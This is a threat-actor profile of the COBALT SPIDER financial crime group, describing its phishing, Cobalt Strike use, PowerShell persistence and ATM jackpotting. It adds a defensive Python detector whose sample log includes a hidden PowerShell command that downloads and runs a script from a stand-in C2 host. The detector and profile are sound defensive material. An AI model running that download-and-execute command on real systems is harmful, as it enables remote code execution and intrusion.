COBALT SPIDER is a financially-motivated criminal group responsible for attacks on financial institutions (FIs) in Russia, Central Asia and Eastern Europe.
The adversary uses spear-phishing emails with malicious attachments to gain access to corporate infrastructure, often exploiting known vulnerabilities with publicly available malware and tools. The group takes its name from its use of the Cobalt Strike Beacon payload in its operations.
Cobalt Strike is a commercial penetration testing tool. Its payload is loaded into memory and lets the attackers open a connection to the infected machine, manage and download additional modules, log keystrokes and conduct port scanning. The Mimikatz module is used to harvest credentials and escalate privileges, giving the attackers greater control of the machine and access across the network.
COBALT SPIDER achieves persistence on the victim machine by creating a startup path that launches malicious code with PowerShell; on each reboot this code connects to a C2 server and reinstalls the Cobalt Strike payload in memory, so the payload is never written to disk. Native Windows operating system capabilities, such as Explorer, are used to connect to additional machines and move laterally within the victim network.
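One defender-side way to look for the autostart-plus-in-memory-reload pattern described above is to score process-creation telemetry for PowerShell started from a logon or Startup context with download-cradle traits. This is an added example, not CrowdStrike's or the page's code; the key=value record format, field names, threshold and sample log lines are all constructed assumptions.

```python
"""Flag PowerShell launched from an autostart context that pulls code into memory.
Added example, not CrowdStrike's or the page's code. The key=value record format and
the sample lines are constructed; map fields onto your own telemetry (e.g. Sysmon ID 1).
"""
import re
# Command-line traits of a download-and-run-in-memory cradle or a hidden/encoded
# PowerShell invocation. Each matching trait adds one to the score.
CRADLE_PATTERNS = {
    "download": re.compile(r"downloadstring|downloadfile|net\.webclient|invoke-webrequest", re.I),
    "in_memory_exec": re.compile(r"\biex\b|invoke-expression", re.I),
    "encoded": re.compile(r"(^|\s)-(enc|encodedcommand|e)\b", re.I),
    "hidden_window": re.compile(r"-w(indowstyle)?\s+hidden", re.I),
}
# Autostart context: the parent is the shell that runs logon items, or the command
# line references a Startup folder or Run-key script.
AUTOSTART_PARENTS = {"explorer.exe", "userinit.exe"}
AUTOSTART_PATH = re.compile(r"\\start menu\\programs\\startup\\|\\currentversion\\run", re.I)
THRESHOLD = 2  # autostart context plus at least one cradle trait

def parse_event(line):
    """Parse key=value pairs; values may be double-quoted to allow spaces."""
    return {k: v.strip('"') for k, v in re.findall(r'(\w+)=("[^"]*"|\S+)', line)}

def score_event(ev):
    """Return (score, reasons) for one process-creation event; (0, []) if not PowerShell."""
    if "powershell" not in ev.get("image", "").lower():
        return 0, []
    cmd = ev.get("cmdline", "")
    reasons = []
    if ev.get("parent", "").lower() in AUTOSTART_PARENTS or AUTOSTART_PATH.search(cmd):
        reasons.append("autostart_context")
    reasons += [name for name, pat in CRADLE_PATTERNS.items() if pat.search(cmd)]
    return len(reasons), reasons

def find_alerts(lines):
    """Return (host, score, reasons) for each event reaching THRESHOLD in an autostart context."""
    alerts = []
    for line in lines:
        ev = parse_event(line)
        score, reasons = score_event(ev)
        if score >= THRESHOLD and "autostart_context" in reasons:
            alerts.append((ev.get("host", "?"), score, reasons))
    return alerts
# Constructed sample records, not real telemetry; WS01 shows the pattern described above.
SAMPLE_LOG = [
    'host=WS01 parent=explorer.exe image=C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe cmdline="powershell -w hidden -nop -c IEX (New-Object Net.WebClient).DownloadString(\'http://c2.example/a\')"',
    'host=WS02 parent=explorer.exe image=C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe cmdline="powershell -File C:\\Scripts\\backup.ps1"',
    'host=WS03 parent=svchost.exe image=C:\\Windows\\System32\\notepad.exe cmdline="notepad.exe"',
]
```

Requiring the autostart context alongside the cradle traits keeps ordinary scheduled or admin PowerShell scripts (WS02) below the alert line while still catching the logon-time in-memory reload.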
The adversary monetizes attacks by targeting ATMs and issuing commands to dispense cash, a technique termed “Jackpotting.” The cash is then collected by a network of money mule operatives who work as part of the campaign team.
It should be noted that COBALT SPIDER actors are not the developers of the Cobalt Strike penetration testing tool and should not be confused with other adversaries also using this software in campaign activity.
Cobalt Group and Cobalt Gang are community/industry names associated with this actor.
To learn more about how to incorporate intelligence on threat actors like COBALT SPIDER into your security strategy, please visit the Falcon Intelligence product page.